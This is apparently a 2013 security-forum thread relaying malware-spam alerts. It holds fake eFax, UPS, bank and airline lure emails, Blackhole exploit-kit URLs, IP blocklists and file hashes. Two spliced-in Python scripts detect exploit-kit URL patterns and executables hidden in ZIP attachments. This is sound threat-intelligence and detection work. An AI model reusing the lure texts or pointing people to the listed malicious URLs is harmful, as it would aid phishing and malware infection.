- http://blog.dynamoo.com/2013/04/efax-spam-ivanikakoru.html
3 April 2013 - "This fake eFax spam leads to malware on ivanikako .ru:
From: Global Express UPS [mailto:admin @ups .com]
Sent: 02 April 2013 21:12
Subject: Efax Corporate
Fax Message [Caller-ID: 189609656]
You have received a 40 pages fax at Wed, 3 Apr 2013 02:11:58 +0600, (708)-009-8464.
* The reference number for this fax is [eFAX-698329221].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
The malicious payload is at [donotclick]ivanikako .ru:8080/forum/links/column.php (report here*) hosted on:
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1786247
... Detected suspicious URL pattern... Blackholev2 redirection 94.103.45.34
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/646911078b2358a4a41b93fac721e580/tumblr_inline_mkoo4xbN8o1qz4rgp.png
___
APT malware monitors mouse clicks to evade detection
- https://www.computerworld.com/s/article/9238062/New_APT_malware_monitors_mouse_clicks_to_evade_detection_researchers_say
April 2, 2013 - "... Called Trojan.APT.BaneChant, the malware is distributed via a Word document rigged with an exploit sent during targeted email attacks. The name of the document translates to "Islamic Jihad.doc." "We suspect that this weaponized document was used to target the governments of Middle East and Central Asia," FireEye researcher Chong Rong Hwa said Monday in a blog post*. The attack works in multiple stages. The malicious document downloads and executes a component that attempts to determine if the operating environment is a virtualized one, like an antivirus sandbox or an automated malware analysis system, by waiting to see if there's any mouse activity before initiating the second attack stage. Mouse click monitoring is not a new detection evasion technique, but malware using it in the past generally checked for a single mouse click... The rationale behind using this service is to bypass URL blacklisting services active on the targeted computer or its network... The backdoor program gathers and uploads system information back to a command-and-control server. It also supports several commands including one to download and execute additional files on the infected computers..."
* http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
April 1, 2013
___
Fake Wire Transfer e-mails
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=28112
2013 April 03 - "... significant activity related to spam e-mail messages that claim to contain a wire transfer notification for the recipient. The text in the e-mail message attempts to convince the recipient to open the attachment and view the final confirmation notice. However, the .zip attachment contains a malicious .scr file that, when executed, attempts to infect the system with malicious code. E-mail messages that are related to this threat (RuleID5193 and RuleID5193KVR) may contain the following files:
out going wire. pdf.zip
npxo.scr
Sales Contract Order.zip
DEDE.scr
The npxo.scr file in the out going wire. pdf.zip attachment has a file size of 509,199 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0x2A41A06A00F4CF58485AF938F01B128D
The DEDE.scr file in the Sales Contract Order.zip attachment has a file size of 221,696 bytes. The MD5 checksum is the following string: 0x79274D0CFAC51906FAF8334952AF2734
The following text is a sample of the e-mail message that is associated with this threat outbreak:
Subject: Re: Out going wire transfer (High Priority)
Message Body:
We have just received instruction to process a wire transfer of $6,780 from your account. Please download/view the attachment for final confirmation and respond as quickly as possible.
Bank Wire Transfer Department.
-Or-
Subject: New Order
Message Body:
Dear Sir,We are currently running out of stock and would need urgent attentionEnclosed please find a new Order. Please send the delivery as quickly
as possible.Meanwhile, please send us the Invoice for endorsement.Best regards Krystyna..."
:fear: :mad:
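The dynamoo post on 151.248.123.170 recommends blocking the Dynamic DNS providers wholesale rather than chasing individual subdomains, and the chain it describes (injected "/jquery/get.php?ver=jquery.latest.js" loader on a Dynamic DNS host, then a ".php" landing page) is the same shape the Blackhole reports in this thread keep showing on port 8080. The script below is an added example, not code from the thread or from dynamoo.com: it runs those rules over constructed proxy-log lines (Squid-like "timestamp client method url status" layout), matches the Dynamic DNS suffixes by domain boundary so "notservegame.com" is not caught, and groups the hits per client so a host that fetched both the loader and a landing page stands out.

```python
"""Flag proxy-log requests to Dynamic DNS hosts and exploit-kit style URLs.

Added example, not code from this thread or dynamoo.com. SAMPLE_LOG is
constructed; the host names in it are the ones quoted in the posts above.
"""
import re
from urllib.parse import urlsplit

# Dynamic DNS providers named in the dynamoo post; extend from your own list.
DYNDNS_SUFFIXES = {"4mydomain.com", "servegame.com"}

# URL shapes quoted in this thread: the injected loader and the Blackhole 2 landing page.
KIT_PATTERNS = [
    ("injected-loader", re.compile(r"^/jquery/get\.php$")),
    ("blackhole-landing", re.compile(r"^/forum/links/column\.php$")),
]

SAMPLE_LOG = """\
1364990400.123 10.0.0.15 GET http://www.example.com/index.html 200
1364990401.456 10.0.0.15 GET http://fdozwnqdb.4mydomain.com/jquery/get.php?ver=jquery.latest.js 200
1364990402.789 10.0.0.15 GET http://db0umfdoap.servegame.com/xlawr/next/requirements_anonymous_ordinary.php 200
1364990403.001 10.0.0.22 GET http://ivanikako.ru:8080/forum/links/column.php 200
1364990405.003 10.0.0.31 GET http://cdn.example.net/jquery/jquery.latest.js 200
"""


def host_matches_dyndns(host):
    """True when host is a Dynamic DNS provider domain or any subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES)


def classify(url):
    """Return the list of rule names a single request URL triggers (empty if none)."""
    parts = urlsplit(url)
    reasons = []
    if host_matches_dyndns(parts.hostname or ""):
        reasons.append("dynamic-dns-host")
    for name, pattern in KIT_PATTERNS:
        if pattern.match(parts.path):
            reasons.append(name)
    # Every landing page quoted in the thread sits on :8080; PHP on that port is worth a look.
    if parts.port == 8080 and parts.path.endswith(".php"):
        reasons.append("php-on-8080")
    return reasons


def scan(log_text):
    """Yield (line number, client, url, reasons) for every flagged log line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 5:
            continue                       # malformed line; skip rather than guess
        reasons = classify(fields[3])
        if reasons:
            hits.append((number, fields[1], fields[3], reasons))
    return hits


def summarize_by_client(hits):
    """Collapse hits into {client: set(reasons)} for triage."""
    summary = {}
    for _, client, _, reasons in hits:
        summary.setdefault(client, set()).update(reasons)
    return summary


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for number, client, url, reasons in found:
        print(f"line {number}: {client} -> {url}  [{', '.join(reasons)}]")
    for client, reasons in summarize_by_client(found).items():
        print(f"{client}: {sorted(reasons)}")
```

The legitimate jQuery fetch from cdn.example.net on the last line is deliberately left in: its path is "/jquery/jquery.latest.js", not "/jquery/get.php", so it passes, which is the difference between matching the injected loader and matching every site that serves jQuery.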
AplusWebMaster
2013-04-04, 18:23
FYI...
- https://www.net-security.org/malware_news.php?id=2455
4.04.2013 - "Malware activity has become so pervasive that organizations experience a malicious email file attachment or Web link as well as malware communication that evades legacy defenses up to once every three minutes, according to FireEye* ..."
* http://www.fireeye.com/blog/technical/malware-research/2013/04/the-new-fireeye-advanced-threat-report.html
> https://www.net-security.org/images/articles/fireeye-042013-1.jpg
___
Fake "Bill Me Later" SPAM / PP_BillMeLater_Receipe04032013_4283422.zip
- http://blog.dynamoo.com/2013/04/bill-me-later-spam-ppbillmelaterreceipe.html
4 Apr 2013 - "This fake "Bill Me Later" spam comes with a malicious attachment:
Date: Wed, 3 Apr 2013 21:42:52 +0600 [04/03/13 11:42:52 EDT]
From: Bill Me Later [notification @billmelater .com]
Subject: Thank you for scheduling a payment to Bill Me Later
BillMeLater
Log in here
Your Bill Me Later® statement is now available!
Dear Customer,
Thank you for making a payment online! We've received your
Bill Me Later® payment of $1644.03 and have applied it to your account.
For more details please check attached file : PP_BillMeLater_Receipe04032013_4283422.zip
Here are the details:
Your Bill Me Later Account Number Ending in: 0014
You Paid: $1644.03
Your Payment Date*: 04/03/2013
Your Payment Confirmation Number: 228646660603545001
Don't forget, Bill Me Later is the perfect way to shop when you want more time to pay for the stuff you need. Plus, you can always find great deals and discounts at over 1000 stores. Watch this short, fun video to learn more.
BillMeLater
*NOTE: If your payment date is Saturday, or a holiday, it will take an additional day for the payment to appear on your account. However, you will be credited for the payment as of the payment date.
Log in at PayPal.com to make a payment
Questions:
Do not reply to this email. Please send all messages through the email form on our website. We are unable to respond to account inquiries sent in reply to this email. Bill Me Later is located at 9690 Deereco Rd, Suite 110, Timonium, MD 21093 Copyright 2012 Bill Me Later Inc.
Bill Me Later accounts are issued by WebBank, Salt Lake City Utah
PP10NDPP1
Screenshot: https://lh3.ggpht.com/-55gUxujP5q4/UV1B22tiK2I/AAAAAAAABDs/gW93tK9GcYY/s1600/bill-me-later.png
There is an attachment called PP_BillMeLater_Receipe04032013_4283422.zip which contains an executable file PP_BillMeLater_Receipe_04032013.exe (note that the date is encoded into the filename) which currently has a VirusTotal detection rate of just 26/46*. The executable is resistant to automated analysis tools but has the following fingerprint:
MD5: c93bd092c1e62e9401275289f25b4003
SHA256: ae5af565c75b334535d7d7c1594846305550723c54bf2ae77290784301b2ac29
Blocking EXE-in-ZIP files at your perimeter is an effective way of dealing with this threat, assuming you have the technology to do it."
* https://www.virustotal.com/en/file/ae5af565c75b334535d7d7c1594846305550723c54bf2ae77290784301b2ac29/analysis/1365065866/
File name: PP_BillMeLater_Receipe_04032013.exe
Detection ratio: 26/46
Analysis date: 2013-04-04
___
Fiserv Money Transfer Spam
- http://threattrack.tumblr.com/post/47109985303/fiserv-money-transfer-spam
4 April 2013 - "Subjects seen:
Outgoing Money Transfer
Typical e-mail details:
An outgoing money transfer request has been received by your financial institution. In order to complete the money transfer please print and sign the attached form.
To avoid delays or additional fees please be sure Beneficiary Information including name, branch name, address, city, state, country, and RTN or SWIFT BIC Code is correct. For international Wires be sure you include the International Routing Code (IRC) and International Bank Account Number (IBAN) for countries that require it.
Thank you,
Joy_Farmer
Senior Officer
Cash Management Verification
Phone : [removed]
Email: [removed]
Malicious URLs
3ecompany .com:8080/ponyb/gate.php
23.wellness-health2day .com/ponyb/gate.php
23.ad-specialties .info/ponyb/gate.php
23.advertisingspecialties .biz/ponyb/gate.php
brightpacket .com/coS0GiKE .exe
u16432594.onlinehome-server .com/d8dTEXk.exe
thedryerventdude .com/2FKBSea .exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/dd047e7d9b198503a19f6e373bc9ccc6/tumblr_inline_mkqjv0RrN91qz4rgp.png
___
Bank of America Trusteer Spam
- http://threattrack.tumblr.com/post/47107312762/bank-of-america-trusteer-spam
4 April 2013 - "Subjects seen:
New Critical Update
Typical e-mail details:
Valued Customer:
As part of our continued effort to enhance online banking safety, Bank of America announced late last year that it has partnered with Trusteer Rapport to add an additional layer of security to our eBusiness platform and we recommend that all of our online banking customers install the software.
Malicious URLs
23.proautorepairdenver .com/forum/viewtopic.php
23.onqdenver .net/forum/viewtopic.php
23.onqdenver .com/forum/viewtopic.php
3ecompany .com:8080/forum/viewtopic.php
dev2.americanvisionwindows .com/rthsWe.exe
adr2009 .it/R4eFC.exe
easy .com.gr/2YcB2jL.exe
konyapalyaco .net/F6pKX68j.exe
homepage.osewald .de/ynWx1.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7ec92f4adb18bd9af21672cf63302558/tumblr_inline_mkqhd7bMm31qz4rgp.png
___
Fake "British Airways" SPAM / igionkialo .ru
- http://blog.dynamoo.com/2013/04/british-airways-spam-igionkialoru.html
4 Apr 2013 - "This fake British Airways spam leads to malware on igionkialo .ru:
Date: Thu, 4 Apr 2013 10:19:48 +0330
From: Marleen Camacho via LinkedIn [member @linkedin .com]
Subject: British Airways E-ticket receipts
Attachments: E-Receipt.htm
e-ticket receipt
Booking reference: UMA7760047
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 69315274. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
The attachment E-Receipt.htm leads to a malicious landing page at [donotclick]igionkialo .ru:8080/forum/links/column.php (report here*) hosted on:
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1805773
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.103.45.34
___
Madi/Mahdi/Flashback OS X connected malware spreading through Skype
- http://blog.webroot.com/2013/04/04/madimahdiflashback-os-x-connected-malware-spreading-through-skype/
April 4, 2013 - "Over the past few days, we intercepted a malware campaign that spreads through Skype messages, exclusively coming from malware-infected friends or colleagues. Once users click on the shortened link, they’ll be exposed to a simple file download box, with the cybercriminals behind the campaign directly linking to the malicious executable...
Sample screenshot of the campaign in action:
> https://webrootblog.files.wordpress.com/2013/04/skype_spreading_malware_social_engineering.png
Sample redirection chain: hxxp ://www.goo .gl/aMrTD?image=IMG0540250-JPG -> hxxp ://94.242.198.67/images.php -> MD5: f29b78be1cd29b55db94e286d48cddef * ... Gen:Variant.Symmi.17255.
More malware is known to have been rotated on the same IP... Upon execution, MD5: d848763fc366f3ecb45146279b44f16a phones back to hxxp ://xlotxdxtorwfmvuzfuvtspel .com/RQQgW6RRMZKWdj0xLjImaWQ9MjQ3NzA0MzA5MiZhaWQ9MzAyODcmc2lkPTQmb3M9NS4xLTMyluYwGI8j – 50.62.12.103. What’s so special about this IP (50.62.12.103) anyway? It’s the fact that it’s known to have been used as a C&C for the Madi/Mahdi malware campaign, as well as a C&C for the Flashback MAC OS X malware, proving that someone’s definitely multi-tasking..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/3537d1ab9c006c67f34dbf2eef21d1654eb6589f832e7e91751a9e10442a3b91/analysis/
File name: reznechek.exe
Detection ratio: 27/46
Analysis date: 2013-04-03
___
Legal Case Spam
- http://threattrack.tumblr.com/post/47112985692/legal-case-spam
4 April 2013 - "Re: Our chances to win the case are better than ever.
Typical e-mail details:
We talked to the administration representatives, and if we acknowledge our minor defiance to improve their statistics, the major suit will be closed due to the lack of the government interest to the action. We have executed your explanatory text for the court. Please read it carefully and if anything in it seems unacceptable, let us know.
Speech.doc 332kb
With Best Wishes
Erica Bermudez
Malicious URLs
3ecompany .com:8080/ponyb/gate.php
lanos-info .ru/winadlor.htm
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/633e808be0731f375658f5c3fcea38ce/tumblr_inline_mkqn05HXcK1qz4rgp.png
___
Pennie stock SPAM
- https://isc.sans.edu/diary.html?storyid=15559
Last Updated: 2013-04-05 00:25:54 UTC - "Most of you will remember the pennie stock SPAM messages from a few years ago. The main aim of the game is to buy a bunch of pennie stock and then do a SPAM campaign to drive buying interest, artificially inflating the price of the stock. They sell and make their money. It may be a few cents per share, but if you own enough of it can be quite profitable. Most SPAM filters are more than capable of identifying and dumping this kind of SPAM. It looks however like it is becoming popular again...
News!!!
Date: Thursday, Apr 4th, 2013
Name: Pac West Equities, Inc.
To buy: P_WEI
Current price: $.19
Long Term Target: $.55
OTC News Subscriber Reminder!!! Releases Breaking News This
Morning!
What is old is new again..."
:fear::mad:
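Two of the posts above describe the same perimeter problem from both sides: the Cisco alert on the wire-transfer lure ("out going wire. pdf.zip" containing npxo.scr) and the dynamoo "Bill Me Later" post, which closes with the advice that blocking EXE-in-ZIP at the perimeter deals with this class of threat. The script below is an added example, not code from this thread, Cisco or dynamoo.com, of what that check looks like when it inspects the archive rather than the outer file name: it opens each ZIP member, flags executable and screensaver extensions, flags document-style double extensions, and flags members whose content starts with the "MZ" header of a Windows PE file even when the name says ".pdf". All archives are built in memory from a constructed stub; the member names mirror the lures quoted in the posts.

```python
"""Inspect a ZIP e-mail attachment for executables hidden under document-like names.

Added example, not code from this thread, Cisco or dynamoo.com. The archives
are built in memory from constructed content; FAKE_PE is a stub, not a program.
"""
import io
import zipfile

# Windows executable/script extensions worth refusing at the mail gateway.
EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".jar"}
# Document extensions that lures put in front of the real one ("Invoice.pdf.exe").
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".htm", ".html", ".txt"}


def looks_like_pe(head):
    """True if the member starts with the DOS 'MZ' stub every PE file carries."""
    return head[:2] == b"MZ"


def extensions(name):
    """All dotted suffixes of a member name: 'a/Receipt.pdf.exe' -> ['.pdf', '.exe']."""
    base = name.lower().rsplit("/", 1)[-1]
    return ["." + part for part in base.split(".")[1:]]


def inspect_zip(data):
    """Return [(member, reason), ...] for one attachment's raw bytes; empty means clean."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<attachment>", "not-a-zip")]
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            exts = extensions(info.filename)
            with archive.open(info) as member:
                head = member.read(2)          # only the magic bytes are needed
            is_exec_name = bool(exts) and exts[-1] in EXEC_EXTENSIONS
            if is_exec_name:
                findings.append((info.filename, "executable-extension"))
            if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTENSIONS:
                findings.append((info.filename, "double-extension"))
            if looks_like_pe(head) and not is_exec_name:
                findings.append((info.filename, "pe-with-non-executable-name"))
    return findings


def should_block(data):
    """Gateway decision: any finding at all blocks the attachment."""
    return bool(inspect_zip(data))


def build_zip(members):
    """Build an in-memory ZIP from {name: bytes}; used only to construct test samples."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, content in members.items():
            archive.writestr(name, content)
    return buffer.getvalue()


# Constructed samples: FAKE_PE carries only the MZ magic, nothing executable.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"constructed stub, not a real program"
WIRE_ZIP = build_zip({"npxo.scr": FAKE_PE})
BILL_ZIP = build_zip({"PP_BillMeLater_Receipe_04032013.exe": FAKE_PE})
DISGUISED_ZIP = build_zip({"Invoice.pdf.exe": FAKE_PE})
RENAMED_ZIP = build_zip({"statement.pdf": FAKE_PE})
CLEAN_ZIP = build_zip({"statement.pdf": b"%PDF-1.4\n% constructed placeholder\n"})

if __name__ == "__main__":
    for label, sample in [("wire", WIRE_ZIP), ("bill", BILL_ZIP), ("disguised", DISGUISED_ZIP),
                          ("renamed", RENAMED_ZIP), ("clean", CLEAN_ZIP)]:
        print(f"{label}: block={should_block(sample)} {inspect_zip(sample)}")
```

The RENAMED_ZIP case is the one an extension-only filter misses: a PE renamed to "statement.pdf" sails through a name check, so the gateway has to read the first two bytes of each member. Reading only the header also keeps the check cheap and avoids extracting a possibly huge or nested archive.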
AplusWebMaster
2013-04-05, 12:23
FYI...
Fake Legal SPAM / itriopea .ru
- http://blog.dynamoo.com/2013/04/speechdoc-legal-spam-itriopearu.html
5 Apr 2013 - "This fake legal spam leads to malware on itriopea .ru:
Date: Thu, 4 Apr 2013 07:44:02 -0500
From: Malaki Brown via LinkedIn [member @linkedin .com]
Subject: Fwd: Our chances to gain a cause are better than ever.
We conversed with the administration representatives, and if we acknowledge our non-essential contempt for the sake of their statistics increase , the key suit will be closed due to the lack of the state interest to the action. We have executed your elucidative text for the court. Please read it carefully and if anything in it disagrees with you, let us know.
Speech.doc 458kb
With respect to you
Malaki Brown
==============
Date: Thu, 4 Apr 2013 05:37:47 -0600
From: Talisha Sprague via LinkedIn [member @linkedin .com]
Subject: Re: Fwd: Our chances to gain a suit are higher than ever.
We talked to the administration representatives, and if we admit our minor infringements for the sake of their statistics increase , the main cause will be closed due to the lack of the government interest to the proceedings. We have executed your explicatory text for the court. Please read it carefully and if anything in it dissatisfies you, advise us.
Speech.doc 698kb
With Best Regards
Talisha Sprague
The attachment Speech.doc leads to a malicious payload at [donotclick]itriopea .ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Turkey)
Blocklist (including active nameservers):
62.76.40.244
62.76.41.245
91.191.170.26
93.187.200.250
109.70.4.231
188.65.178.27
199.66.224.130
199.191.59.60
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1824890
... Detected suspicious URL pattern... Blackhole 2 Landing Page 93.187.200.250
___
Facebook Photo Share Spam
- http://threattrack.tumblr.com/post/47127129161/facebook-photo-share-spam
5 Apr 2013 - "Subjects Seen:
[removed] shared photo of you.
Typical e-mail details:
[removed] commented on Your photo.
Reply to this email to comment on this photo.
Malicious URLs
barroj .info/images/cnnbrnews.html
craftypidor .info/complaints/arrangement-select.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/071ef811ad841c1a6c155ae7cdb0bf51/tumblr_inline_mkqx97mG4I1qz4rgp.png
___
Fake Invoice SPAM / ijsiokolo .ru
- http://blog.dynamoo.com/2013/04/end-of-aug-statement-spam-ijsiokoloru.html
5 Apr 2013 - "This fake invoice spam leads to malware on ijsiokolo .ru:
Date: Fri, 5 Apr 2013 07:57:37 +0300
From: "Account Services ups" [upsdelivercompanyb @ups .com]
Subject: Re: End of Aug. Statement Required
Attachments: Invoice_AF146989113.htm
Good morning,
I give you inovices issued to you per Feb. (Microsoft Internet Explorer format).
Regards
DAYLE PRIEST
===========
Date: Fri, 5 Apr 2013 07:56:53 -0300
From: "Tracking" [ups-account-services @ups .com]
Subject: Re: FW: End of Aug. Stat.
Hallo,
I give you inovices issued to you per Feb. (Microsoft Internet Explorer format).
Regards
Mariano LEE
The .htm attachment in the email leads to malware at [donotclick]ijsiokolo .ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Germany)
Blocklist:
91.191.170.26
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1829725
... Detected suspicious URL pattern... Blackhole 2 Landing Page 208.94.108.238
___
Fake "Copies of Policies" SPAM / ifikangloo .ru
- http://blog.dynamoo.com/2013/04/copies-of-policies-spam-ifikanglooru.html
5 April 2013 - "This spam leads to malware on ifikangloo .ru:
From: KaelSaine @mail .com [mailto:KaelSaine @mail .com]
Sent: 05 April 2013 11:43
Subject: Fwd: LATONYA - Copies of Policies
Unfortunately, I cannot obtain electronic copies of the SPII policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
LATONYA Richmond,
The link in the email leads to a legitimate -hacked- site and then on to [donotclick]ifikangloo .ru:8080/forum/links/column.php (report here*) hosted on the same IPs used in this attack**:
91.191.170.26 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Germany)
Blocklist:
91.191.170.26
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1831322
... Detected suspicious URL pattern... Blackhole 2 Landing Page 208.94.108.238
** http://blog.dynamoo.com/2013/04/end-of-aug-statement-spam-ijsiokoloru.html
Variation - same theme: http://threattrack.tumblr.com/post/47198256015/copies-of-policies-spam
5 Apr 2013
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2b9cdfc34cf99aefa37735bb802f518d/tumblr_inline_mksijkLKJT1qz4rgp.png
___
Fake eFax Corpoprate Spam
- http://threattrack.tumblr.com/post/47211038345/efax-corpoprate-spam
5 April 2013 - "Subjects Seen:
Corporate eFax message from Caller ID : “[removed]” - 3 page(s)
Typical e-mail details:
You have received a 3 page(s) fax at 2013-04-05 02:31:33 CST.
* The reference number for this fax is [removed].
View this fax using your PDF reader.
Click here to view this message
Please visit eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service!
Malicious URLs
estherashe .com/winching/index.html
23.frameless-glass-shower-enclosures .com/forum/viewtopic.php
23.frameless-glass-shower-enclosures .com/adobe/update_flash_player.exe
23.garryowen .biz/adobe/
albenden .com/F2SyzQtn.exe
globalinfocomgroup .com/r18Lm7RJ.exe
209.164.63.90 /otQw.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/96ba9a0d3a2efd75fcae8c63881e33a8/tumblr_inline_mkss1ojWsl1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-04-06, 16:41
FYI...
Fake pharmacy SPAM / accooma .org / classic-pharmacy .com
- http://blog.dynamoo.com/2013/04/updated-information-spam-accoomaorg.html
6 April 2013 - "This scary looking spam is nothing more than an attempt to get you to click through to a fake pharmacy site:
Date: Mon, 9 Feb 2004 13:00:35 +0000 (GMT)
From: "Account Info Change" [info @virtualregistrar .com]
Subject: Updated information
Updated information
Hello,
The following information for your ID [redacted] was updated on 02/09/2012: Date of birth, Security question and answer.
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password immediately.
This is an automated message. Please do not reply to this email. If you need additional help, visit our Support Center.
Thanks,
Customer Support
The link in the email goes to a landing page on accooma .org (184.82.155.18 - HostNOC, US) which clicks through to classic-pharmacy .com (184.82.155.20 - also HostNOC). These two IPs are very close together which indicates a bad block. There does not appear to be any malware involved (see here* and here**) and of course nobody has changed any details on your account. You can safely ignore these emails. A closer examination shows that HostNOC have suballocated 184.82.155.16/29 (184.82.155.16 - 184.82.155.23) to an unknown party... fake pharma sites are active in this range..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1850413
** http://urlquery.net/report.php?id=1850445
- https://www.google.com/safebrowsing/diagnostic?site=AS:21788
"... over the past 90 days, 1069 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-04-06, and the last time suspicious content was found was on 2013-04-06... we found 227 site(s) on this network... that appeared to function as intermediaries for the infection of 981 other site(s)... We found 384 site(s)... that infected 1772 other site(s)..."
___
Fake Facebook pwd reset SPAM / accooma .org
- http://blog.dynamoo.com/2013/04/facebook-reminder-reset-your-password.html
6 April 2013 - "Another very aggressive spam run promoting accooma .org which is a fake pharma site..
Date: Sat, 6 Apr 2013 13:16:59 -0700 [16:16:59 EDT]
From: Facebook
Subject: Reminder: Reset your password
facebook
You recently requested a new password for your Facebook account. It looks like we sent you an email with a link to reset your password 2 ago.
This is a reminder that you need to complete this action by clicking this link and Confirm or Cancel your request.
If you have any other questions, please visit our Help Center.
Thanks,
The Facebook Team
The emails vary somewhat in content. I've received 60+ of these today to one email account alone, so this site is being pushed very hard indeed. Although the email is annoying, it does not seem to be harmful. For more details, see this earlier post* about another spam run for the same domain."
* http://blog.dynamoo.com/2013/04/updated-information-spam-accoomaorg.html
:mad:
AplusWebMaster
2013-04-08, 19:01
FYI...
Fake Bank SPAM / ighjaooru .ru
- http://blog.dynamoo.com/2013/04/m-bank-bankruptcy-spam-ighjaooruru.html
8 Apr 2013 - "I've never heard of M&I Bank but this is quite an old school spam campaign that leads to malware on ighjaooru .ru:
Date: Mon, 8 Apr 2013 -01:41:06 -0800
From: Coral Randolph via LinkedIn [member @linkedin .com]
Subject: Re: Fwd: M&I Bank bankruptcy
Hi, bad news.
M&I Bank bankruptcy
The malicious payload is at [donotclick]ighjaooru .ru:8080/forum/links/column.php (report here*) hosted on a whole load of IPs:
72.167.254.194 (GoDaddy, US)
80.246.62.143 (Alfahosting, Germany)
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
72.167.254.194
80.246.62.143
91.191.170.26
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1885773
... Detected suspicious URL pattern... Blackhole 2 Landing Page 72.167.254.194
___
Fake obit SPAM / ighjaooru .ru
- http://blog.dynamoo.com/2013/04/kissinger-thatchers-strong-beliefs-spam.html
8 April 2013 - "It didn't take long for the Margaret Thatcher themed malware to start after her death. This one leads to malware on ighjaooru .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of Josefa Jimenez via LinkedIn
Sent: 08 April 2013 05:41
Subject: Fwd: Re: Kissinger: Thatcher's strong beliefs
Hi, bad news.
Kissinger: Thatcher's strong beliefs...
The payload and associated domains and IPs are exactly the same as used in this attack*."
* http://blog.dynamoo.com/2013/04/m-bank-bankruptcy-spam-ighjaooruru.html
___
Malicious NASA Asteroid Spam
- http://threattrack.tumblr.com/post/47456625841/malicious-nasa-asteroid-spam
8 April 2013 - "Subjects Seen:
Fwd: NASA plans to catch an asteroid
Typical e-mail details:
Hi, bad news.
NASA plans to catch an asteroid..."
Malicious URLs
worldtennisstars .ru/gakmail.htm
iztakor .ru:8080/forum/links/column.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/15ec241d9c739c2f49c9ddedd8e51515/tumblr_inline_mkxwocperr1qz4rgp.png
___
Bad News Spam
- http://threattrack.tumblr.com/post/47461282298/bad-news-spam
8 April 2013 - "Subjects Seen:
Fwd: Re: War with N. Korea
Re: Bank of America bankruptcy
Re: Fwd: Tax havens busted
Re: M&I Bank bankruptcy
Re: Fwd: Shedding light on ‘dark matter’
Typical e-mail details:
Hi, bad news.
<E-mail subject news story>
Malicious URLs
joanred.altervista .org/gakmail.htm
vtoto .ru/gakmail.htm
delta-mebel .by/gakmail.htm
